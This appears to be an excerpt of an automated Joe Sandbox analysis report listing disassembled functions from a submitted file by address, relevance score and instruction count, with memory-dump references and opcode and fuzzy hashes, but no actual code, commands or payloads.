                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                    • Instruction ID: 7f8f929e2553ead0bf7d1e7d5c50cb4d2d08c6107fb46c18022a04ac32e04ecb
                                    • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                    • Instruction Fuzzy Hash: BCD13670610B40CFD725CF29C494BA7B7E0BB49304F14892ED9AB8BB91DB35E949CB91
                                    Function 00C2D720 Relevance: .3, Instructions: 295COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                    • Instruction ID: 0c5d8aaa9c1fdba0f77bb75eade655ba0fdd550d96522e2230e2dd3414fa2a2d
                                    • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                    • Instruction Fuzzy Hash: B1D13DB010C3908FD314CF55D0A472BBFE0AF95708F19895DE4E91B791C7BA8A49DB92
                                    Function 00C145A8 Relevance: .3, Instructions: 291COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                    • Instruction ID: e475532255092d49d34880fb8674ca268e93e56c3a1c273aa1cbc9348f669e55
                                    • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                    • Instruction Fuzzy Hash: 1CB18172A083515BD308CF25C8917ABF7E2EFC8310F1AC93EF89997291D774D9459A82
                                    Function 00C01D78 Relevance: .3, Instructions: 291COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                    • Instruction ID: 99571b8d96b74c8a12ed1ecca8c6625de2c75f9e337e3a5cce76678a73d90385
                                    • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                    • Instruction Fuzzy Hash: CAB18272A083115BD308CF25C89175BF7E2EFC8310F5AC93EF8A997291D774D9459A82
                                    Function 00C02138 Relevance: .3, Instructions: 284COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                    • Instruction ID: a5cf1b5ed37e28f2f7879679e1c2ee488a14524f395a1d7771ee961f1096b2fa
                                    • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                    • Instruction Fuzzy Hash: E8B10871A097118FD706EE3EC491219F7E1AFE6280F51C72EE895B7662EB31E881C740
                                    Function 00C41EE8 Relevance: .3, Instructions: 274COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                    • Instruction ID: 56d399e9a2cd7d890431457cbbfbeded68f42b198692fc719ff06cf80bf63437
                                    • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                    • Instruction Fuzzy Hash: 7891F671E002118BDF24CEA8DC82BBAB7A0BF55310F994564FD55AB382D372DE46C7A1
                                    Function 00C596FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                    • Instruction ID: 90fa7cbb2bfe43ef9f260d1ce49a6d3b518b8236fce2ffcf611c6e42454110cd
                                    • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                    • Instruction Fuzzy Hash: 4BB14B39510609DFD715CF28C486B647BA0FF45366F29869CE8A9CF2A2C335DA85CB44
                                    Function 00C2B198 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction ID: 3944c6f783b79ae41fbdd77ff4e26987e5bad3deb57ed09a325484fb2ccaf34d
                                    • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction Fuzzy Hash: 64C14A75A0471A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                                    Function 00C3D5A8 Relevance: .3, Instructions: 258COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction ID: 02fca7561febcd170fc9d3c9fd10503f19ae39a4bf8069977ff09e541a6f3eda
                                    • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction Fuzzy Hash: DE9188308387906AEB128B3CDC427BAB764FFE2350F14C31AF999724A1FB7196858345
                                    Function 00C4D39E Relevance: .2, Instructions: 242COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction ID: 89c16210fdf9856c702fb836d2f55b14ea65f3fe967b7505ba96668026c2f6f1
                                    • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction Fuzzy Hash: 7FA14072A10A19CBEB19CF55CCD1A9EBBB0FB54324F15C62AD41AE73A0D334AA40CF50
                                    Function 00C14288 Relevance: .2, Instructions: 240COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction ID: 6e7d8f68caedd253f817177854b2d4c97e8b761660941367561cc982d5bb4b05
                                    • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction Fuzzy Hash: 44A16E72E083119BD308CF25C89075BF7E2EFC8710F5ACA3DA8A997254D774E9419B82
                                    Function 010F15EB Relevance: .2, Instructions: 174COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
